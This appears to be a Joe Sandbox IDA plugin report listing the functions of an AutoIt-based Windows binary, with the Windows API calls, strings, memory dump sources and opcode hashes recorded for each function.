                                                                        • Opcode ID: 1fbfd9a83fcce669ae2515ac4fb15a062bb5f25f88dd668f2562ddef395f49d2
                                                                        • Instruction ID: 8876d7fa813dc2ace5fd7ad10d2b6e0c0ab4be36fe3ef124f2f37910aa31f733
                                                                        • Opcode Fuzzy Hash: 1fbfd9a83fcce669ae2515ac4fb15a062bb5f25f88dd668f2562ddef395f49d2
                                                                        • Instruction Fuzzy Hash: D8C194306042558FCB04EF10C551AAEB7E5EF95348F10685AF89A7B3A7DB20ED4BDB81
                                                                        Function 00EDD575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSysColor.USER32(00000012), ref: 00EDD5AE
                                                                        • SetTextColor.GDI32(?,?), ref: 00EDD5B2
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00EDD5C8
                                                                        • GetSysColor.USER32(0000000F), ref: 00EDD5D3
                                                                        • CreateSolidBrush.GDI32(?), ref: 00EDD5D8
                                                                        • GetSysColor.USER32(00000011), ref: 00EDD5F0
                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EDD5FE
                                                                        • SelectObject.GDI32(?,00000000), ref: 00EDD60F
                                                                        • SetBkColor.GDI32(?,00000000), ref: 00EDD618
                                                                        • SelectObject.GDI32(?,?), ref: 00EDD625
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00EDD644
                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EDD65B
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00EDD670
                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EDD698
                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EDD6BF
                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00EDD6DD
                                                                        • DrawFocusRect.USER32(?,?), ref: 00EDD6E8
                                                                        • GetSysColor.USER32(00000011), ref: 00EDD6F6
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00EDD6FE
                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00EDD712
                                                                        • SelectObject.GDI32(?,00EDD2A5), ref: 00EDD729
                                                                        • DeleteObject.GDI32(?), ref: 00EDD734
                                                                        • SelectObject.GDI32(?,?), ref: 00EDD73A
                                                                        • DeleteObject.GDI32(?), ref: 00EDD73F
                                                                        • SetTextColor.GDI32(?,?), ref: 00EDD745
                                                                        • SetBkColor.GDI32(?,?), ref: 00EDD74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 1996641542-0
                                                                        • Opcode ID: bf78c4a1d8e6f4789d13fd75d125663bce24cbdf7a7c1daca7c4a973f716d27b
                                                                        • Instruction ID: ccd4cb2414f27ca6ab8b84e38b0e84fea0da50c8611741a68552f2ceed3daa20
                                                                        • Opcode Fuzzy Hash: bf78c4a1d8e6f4789d13fd75d125663bce24cbdf7a7c1daca7c4a973f716d27b
                                                                        • Instruction Fuzzy Hash: FC515C71905208EFDB10AFA5DC48EAE7F7AEF88324F104116F915BB2A0D7719A45DF90
                                                                        Function 00EDB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EDB7B0
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EDB7C1
                                                                        • CharNextW.USER32(0000014E), ref: 00EDB7F0
                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EDB831
                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EDB847
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EDB858
                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EDB875
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00EDB8C7
                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EDB8DD
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EDB90E
                                                                        • _memset.LIBCMT ref: 00EDB933
                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EDB97C
                                                                        • _memset.LIBCMT ref: 00EDB9DB
                                                                        • SendMessageW.USER32 ref: 00EDBA05
                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EDBA5D
                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00EDBB0A
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00EDBB2C
                                                                        • GetMenuItemInfoW.USER32(?), ref: 00EDBB76
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EDBBA3
                                                                        • DrawMenuBar.USER32(?), ref: 00EDBBB2
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00EDBBDA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                        • String ID: 0
                                                                        • API String ID: 1073566785-4108050209
                                                                        • Opcode ID: a93362df1d9734d97a1d91fa9d696670f79683a4ef43e1ab37c93084c8615522
                                                                        • Instruction ID: f1e67886173fce7032d30a9e2f0157f08fb32e1881fd391be713e13b9661ceed
                                                                        • Opcode Fuzzy Hash: a93362df1d9734d97a1d91fa9d696670f79683a4ef43e1ab37c93084c8615522
                                                                        • Instruction Fuzzy Hash: 53E17B75900208EFDF209FA1CC85AEE7BB8EF45714F119157F919BA290EB708A46DF60
                                                                        Function 00ED764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 00ED778A
                                                                        • GetDesktopWindow.USER32 ref: 00ED779F
                                                                        • GetWindowRect.USER32(00000000), ref: 00ED77A6
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00ED7808
                                                                        • DestroyWindow.USER32(?), ref: 00ED7834
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00ED785D
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00ED787B
                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00ED78A1
                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00ED78B6
                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00ED78C9
                                                                        • IsWindowVisible.USER32(?), ref: 00ED78E9
                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00ED7904
                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00ED7918
                                                                        • GetWindowRect.USER32(?,?), ref: 00ED7930
                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00ED7956
                                                                        • GetMonitorInfoW.USER32 ref: 00ED7970
                                                                        • CopyRect.USER32(?,?), ref: 00ED7987
                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00ED79F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                        • String ID: ($0$tooltips_class32
                                                                        • API String ID: 698492251-4156429822
                                                                        • Opcode ID: 409eed3899e3285d2b0d8bf71b46c649d6f1ae555cf40a5addf3781c6e9c9560
                                                                        • Instruction ID: 1d23d70ac308d424f2d596ae1a3baee5cafcf586fbc66fb77ec81acd84cf0fc2
                                                                        • Opcode Fuzzy Hash: 409eed3899e3285d2b0d8bf71b46c649d6f1ae555cf40a5addf3781c6e9c9560
                                                                        • Instruction Fuzzy Hash: 4FB1A071608341AFDB04DF65C948B6ABBE5FF88314F00991EF5D9AB291E770E805CB91
                                                                        Function 00E8A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E8A939
                                                                        • GetSystemMetrics.USER32(00000007), ref: 00E8A941
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E8A96C
                                                                        • GetSystemMetrics.USER32(00000008), ref: 00E8A974
                                                                        • GetSystemMetrics.USER32(00000004), ref: 00E8A999
                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E8A9B6
                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00E8A9C6
                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E8A9F9
                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E8AA0D
                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00E8AA2B
                                                                        • GetStockObject.GDI32(00000011), ref: 00E8AA47
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E8AA52
                                                                          • Part of subcall function 00E8B63C: GetCursorPos.USER32(000000FF), ref: 00E8B64F
                                                                          • Part of subcall function 00E8B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00E8B66C
                                                                          • Part of subcall function 00E8B63C: GetAsyncKeyState.USER32(00000001), ref: 00E8B691
                                                                          • Part of subcall function 00E8B63C: GetAsyncKeyState.USER32(00000002), ref: 00E8B69F
                                                                        • SetTimer.USER32(00000000,00000000,00000028,00E8AB87), ref: 00E8AA79
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                        • String ID: AutoIt v3 GUI
                                                                        • API String ID: 1458621304-248962490
                                                                        • Opcode ID: 140212d015740c4c7a155d69e190d7a02cbf251681f2e4fe765527d2b5de6968
                                                                        • Instruction ID: bf8a2d87444c8d84b4a2a28ed256b3ee5efdae57e15fda08409bf98655e59a50
                                                                        • Opcode Fuzzy Hash: 140212d015740c4c7a155d69e190d7a02cbf251681f2e4fe765527d2b5de6968
                                                                        • Instruction Fuzzy Hash: 57B1BE7160420A9FDB04EFA8DC45BED7BB5FB48324F15522AFA19B7290DB70E840CB51
                                                                        Function 00E72EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Foreground
                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                        • API String ID: 62970417-1919597938
                                                                        • Opcode ID: 1055b248e6c71c7a44b50a2a8ccd36deb078caaf9d0aa2a2634cfe3771f132f0
                                                                        • Instruction ID: deb0907c2ca6d59072adc0102f6c99e4347c76be46dc5088011f792f092cf7bb
                                                                        • Opcode Fuzzy Hash: 1055b248e6c71c7a44b50a2a8ccd36deb078caaf9d0aa2a2634cfe3771f132f0
                                                                        • Instruction Fuzzy Hash: F6D1E830508686AFCB04EF21C841A9ABBF4FF54304F10A91DF65A775A2DB30E95ADB91
                                                                        Function 00ED3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ED3735
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F0DC00,00000000,?,00000000,?,?), ref: 00ED37A3
                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00ED37EB
                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00ED3874
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00ED3B94
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00ED3BA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                        • API String ID: 536824911-966354055
                                                                        • Opcode ID: 7309a11885db6929e99e49632cc53529291a2e7eedf785f8bfd69ad1e92bde42
                                                                        • Instruction ID: 6d6d0dabf63234c8f54f3e96a16eb45172837c17ca496e7efab9e332bb1b201d
                                                                        • Opcode Fuzzy Hash: 7309a11885db6929e99e49632cc53529291a2e7eedf785f8bfd69ad1e92bde42
                                                                        • Instruction Fuzzy Hash: D4025E75204601AFCB14EF24C855A2EB7E5FF88714F04945DF99AAB3A2DB30ED41CB82
                                                                        Function 00ED6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 00ED6C56
                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00ED6D16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharMessageSendUpper
                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                        • API String ID: 3974292440-719923060
                                                                        • Opcode ID: 2ac40d8d9001db2e4d92136b78f24683db6288639d2b361d20765fd11b8a6ed2
                                                                        • Instruction ID: dc8d7dc02a70c0f28785698a50a996afd7e43bd57df82c7caecf29bb75cd491c
                                                                        • Opcode Fuzzy Hash: 2ac40d8d9001db2e4d92136b78f24683db6288639d2b361d20765fd11b8a6ed2
                                                                        • Instruction Fuzzy Hash: 13A14E302142419FCB14FF14D951A6AB3E6EF95314F14A96EB85ABB3D2DB30ED06CB41
                                                                        Function 00EACF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00EACF91
                                                                        • __swprintf.LIBCMT ref: 00EAD032
                                                                        • _wcscmp.LIBCMT ref: 00EAD045
                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EAD09A
                                                                        • _wcscmp.LIBCMT ref: 00EAD0D6
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00EAD10D
                                                                        • GetDlgCtrlID.USER32(?), ref: 00EAD15F
                                                                        • GetWindowRect.USER32(?,?), ref: 00EAD195
                                                                        • GetParent.USER32(?), ref: 00EAD1B3
                                                                        • ScreenToClient.USER32(00000000), ref: 00EAD1BA
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00EAD234
                                                                        • _wcscmp.LIBCMT ref: 00EAD248
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00EAD26E
                                                                        • _wcscmp.LIBCMT ref: 00EAD282
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                        • String ID: %s%u
                                                                        • API String ID: 3119225716-679674701
                                                                        • Opcode ID: 3692e0fdf20cc2332e64860e9832e33f3f62c4370bf30f31829120cee072dd67
                                                                        • Instruction ID: 612ff94b658458a415ef4fefafc71dca2e6a84b713448b45c02ef93d552b8d6c
                                                                        • Opcode Fuzzy Hash: 3692e0fdf20cc2332e64860e9832e33f3f62c4370bf30f31829120cee072dd67
                                                                        • Instruction Fuzzy Hash: 58A1F471608302AFD714DF64CC84BAAB7E9FF49318F009519F99AEA590DB30F905CBA1
                                                                        Function 00EAD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00EAD8EB
                                                                        • _wcscmp.LIBCMT ref: 00EAD8FC
                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00EAD924
                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00EAD941
                                                                        • _wcscmp.LIBCMT ref: 00EAD95F
                                                                        • _wcsstr.LIBCMT ref: 00EAD970
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00EAD9A8
                                                                        • _wcscmp.LIBCMT ref: 00EAD9B8
                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00EAD9DF
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00EADA28
                                                                        • _wcscmp.LIBCMT ref: 00EADA38
                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00EADA60
                                                                        • GetWindowRect.USER32(00000004,?), ref: 00EADAC9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                        • String ID: @$ThumbnailClass
                                                                        • API String ID: 1788623398-1539354611
                                                                        • Opcode ID: 1284ae7bf9361e345a26a506fbfcfed5a099efce2c01b89eae001496bba61d83
                                                                        • Instruction ID: 12c6ef31e8dff5084ab234ea207583b7377a6693f388e803f65fa4f5859f2c53
                                                                        • Opcode Fuzzy Hash: 1284ae7bf9361e345a26a506fbfcfed5a099efce2c01b89eae001496bba61d83
                                                                        • Instruction Fuzzy Hash: 6D81927110C2059FDB05DF10CC85BAA7BE8EF89718F049469FD8AAE096DB70ED45CBA1
                                                                        Function 00EAD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                        • API String ID: 1038674560-1810252412
                                                                        • Opcode ID: 88b1f946a445db867364e258fab368dd263978fae71f66921d8357918e04fcf9
                                                                        • Instruction ID: 8bc092f8a62e9bb5ec9051fc861799a9e85e9721e89ce0955f89d7b5247f5f39
                                                                        • Opcode Fuzzy Hash: 88b1f946a445db867364e258fab368dd263978fae71f66921d8357918e04fcf9
                                                                        • Instruction Fuzzy Hash: 6E31DE32A48209BADB18EA50ED43EEDB3F89F25714F602069F446B94D1EB61FF04D612
                                                                        Function 00EAEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadIconW.USER32(00000063), ref: 00EAEAB0
                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EAEAC2
                                                                        • SetWindowTextW.USER32(?,?), ref: 00EAEAD9
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00EAEAEE
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00EAEAF4
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00EAEB04
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00EAEB0A
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EAEB2B
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EAEB45
                                                                        • GetWindowRect.USER32(?,?), ref: 00EAEB4E
                                                                        • SetWindowTextW.USER32(?,?), ref: 00EAEBB9
                                                                        • GetDesktopWindow.USER32 ref: 00EAEBBF
                                                                        • GetWindowRect.USER32(00000000), ref: 00EAEBC6
                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00EAEC12
                                                                        • GetClientRect.USER32(?,?), ref: 00EAEC1F
                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00EAEC44
                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EAEC6F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                        • String ID:
                                                                        • API String ID: 3869813825-0
                                                                        • Opcode ID: b72856d468ddc8e3dcec0c68ef36e70cec9c1dd47e6f7143bbaa901d398d90a3
                                                                        • Instruction ID: fd0767849fbec5c702969f3b4a9a44fbbde976f9af44f69d3e84629435520f7e
